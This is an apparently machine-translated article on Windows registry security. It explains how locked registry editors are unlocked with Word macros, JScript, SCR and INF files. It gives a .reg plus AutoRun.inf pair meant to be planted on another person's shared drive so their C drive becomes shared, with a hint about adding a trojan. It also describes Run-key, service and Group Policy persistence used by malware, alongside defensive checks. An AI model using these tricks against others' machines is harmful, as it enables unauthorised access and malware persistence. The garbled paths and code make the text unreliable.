Simplified advanced registry usage Security

The author found that the key content of the book about the registry is to explain the Registry about personalized settings and system optimization, however, there is little concern about the increasingly rampant "hacking" behavior, Trojan viruses, and nasty malicious websites in the real network environment. I will elaborate on the security content of the Registry here, hoping to be effective.
I. Registry and "hacker" behavior

Hackers exploit the Registry to include:

A: Break through some network management software restrictions

B: Share a specific hard disk partition and run the specified program

C: Start the hacker program and other three aspects, which are B and C which cause great harm.

1. Break through some network management software restrictions

Some Internet cafe administrators are even abnormal. As a result, the "free warrior" began to use the registry for a big breakthrough.

　　

Can Word also unlock the registry? That's right! We are using the "macro" provided by Microsoft in Word. I didn't expect it? The specific method is: run the Word and write the "Unlock" macro as shown below to Unlock the registry:

Sub Unlock ()

Dim RegPath As String

RegPath = "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"

System. PrivateProfileString (FileName: = "", Section: = RegPath, Key: = "Disableregistrytools") = "OK !"

End Sub

③ Unlock using JavaScript and VBScript

Script Language to unlock the Registry. In this case, many malicious websites rely on it to lock our registry. Now we can use it to unlock the Registry against its path. Only the core JavaScript code is provided here. Use NotePad to edit the following files and save them as any files suffixed with. js. You can double-click them.

VAR WSHShell = WSCRIPT. CREA-TOBJEt ("WSCRIPT. SHELL ");

WSHShell. Popup ("unlock Registry ");

WSHShell. RegWrite ("HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \

System \ DisableRegistryTools ", 0," reg_dword ");

Note: When Using JS to operate on the key value, use the two slash "\" and use ";" to end the operation.

④ Unlock the registry using the SCR file

As we all know, the SCR file is a screen saver file. How can the SCR file be used to unlock the registry? Modify is to rename the Registration Table editor regedit.exe to Regedit. scr. Then, right-click the desktop, select "properties" from the context menu, and select "Screen Saver" in the displayed "show properties" dialog box ", in the "Screen Saver" drop-down list box, find the "screen saver file" Regedit (Figure 1), and click the "preview" button to open the Registry Editor. Change the key value and then unlock the registry after restarting the computer! (Remember to change the SCR file back !)

 

Figure 1

⑤ Use the INF file to unlock

In Windows, there is a Driver Installation File suffixed with INF, which is actually a script language and executed through interpretation. It contains all the installation information of the device driver, including statements related to the Registry Modification, so we can also use the INF file to unlock the registry.

[Version]

Signature = "$ CHICAGO $"

[Defainstall install]

DelReg = UnLock

[UnLock]

HKCU, SoftwareMicrosoftWindowsCurrentVersionPolicies

System, Disableregistrytools,

1, 00, 00, 00

Save the above content as a file with the suffix ". inf". You only need to right-click it and select "Install" in the pop-up menu to unlock the Registry (2 ).

　　

 

Figure 2

　　

First, open notepad and edit the reg file as follows:

REGEDIT4

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

NetworkLanmanC $] // here I only share the C drive. You can add more

"Path" = "C :\"

"Remark" = ""

"Type" = dword: 00000000

"Flags" = dword: 00000192

"Parm1enc" = hex:

"Parm2enc" = hex:

Save it as the ShareDrives. reg file. Open notepad and enter the following content:

[AutoRun]

Open = regedit/s ShareDrives. reg // here the/s parameter is used to import the registry information without any prompts

Save it as the AutoRun. inf file.

Copy the two files to the root directory of the drive disk shared by the other party. Then, you only need to double-click the shared drive disk and the ShareDrives will be automatically added. the reg file is imported to the Registry. After the other party restarts the system, the C drive is shared. Think about it ..." After adding the trojan name and copying the configured Trojan server together, what will happen in the future?

So how to deal with such attacks? Because AutoRun is not required in the root directory of the hard disk. inf file to run the program, so we can use a permanent way to completely disable the AutoRun function of the hard disk, even if the root directory of the hard disk has AutoRun. inf file, the operating system will not run the specified program. Win98 is used as an example. Open the Registry Editor and find the primary key of [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer]. In the right box of the Registry Editor, the binary value "NoDriveTypeAutoRun ", finally, you only need to change the data value from the default "95 00 00 00" to "9d 00 00 00. I will not explain the principles.

3. Start hacker programs

The purpose of using the registry to start a hacker program is to automatically run the hacker program at startup. This is also one of the common methods for Automatic startup of many Trojan viruses. The common method is to add the hacker program name and parameters to the corresponding key value of the registry. In this way, the computer automatically loads the corresponding registry key each time it starts up, in this way, hackers can achieve the purpose of resident memory. In addition, more concealed methods will be detailed in the "registry and Trojan virus" section.

Open the Registry Editor and view the following information:

All key values starting with "run" in HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion;

All key values starting with "run" in HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion;

All key values starting with "run" in HKEY_USERS.DefaultSoftware MicrosoftWindowsCurrentVersion.

If an unknown key value is found, it is likely that the program is implanted illegally.

Ii. Registry and Virus

Next let's take a look at how viruses use the registry. Generally, viruses use the registry to obtain basic information about the system, such as the operating system type, installed service programs, IE, OutLook, and other application software versions. This is mainly to detect and exploit system and software vulnerabilities. More importantly, the virus is intended to achieve the same objective of hacking programs through the Registry-self-starting at startup and resident memory. Only in this way can the virus infect other machines and files and have the opportunity to "Destroy" them ".

Open the Registry Editor and find:

All key values starting with "run" in HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion;

All key values starting with "run" in HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion;

All key values starting with "run" in HKEY_USERS.DefaultSoftware MicrosoftWindowsCurrentVersion.

Most viruses will quietly settle in the above three locations. In this case, we only need to delete the corresponding key value and then delete the virus program.

In addition, viruses can also register themselves as system services to achieve more concealed boot and self-start purposes. The basic principle is that in WIN2K, the "Startup Type" is set to "automatic", and the system will run automatically at startup, you only need to add the virus itself to the system service, and set the "Startup Type" to "automatic" to automatically run the virus program every time you start the system. Its location in the registry is as follows:

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices ServiceNameParameters]

"Application" = "C: \ winnt \ system32 \ ServiceName.exe

Specifically, ServiceName is the name of the virus.

However, the virus registers itself as a "service" program of the system. Another drawback is that the System Configuration Utility (execute "Msconfig" in "Start> Run ") can be seen in the "Start" and "service" items. Is there a more concealed way than this? The answer is yes. Run "Gpedit. msc" in "Start> Run ". Open "Group Policy" and you can see that "Local Computer Policy" has two options: "Computer Configuration" and "user configuration". Expand "user configuration> management template> system> Logon ", double-click the subitem "run these programs when a user logs on" to set properties, select the "enabled" item in the "Settings" item, and click the "show" button to bring up the "show content" window, click the Add button, enter the path of the program to be started in the text box in the Add project window, and click OK. 3:

　　

Figure 3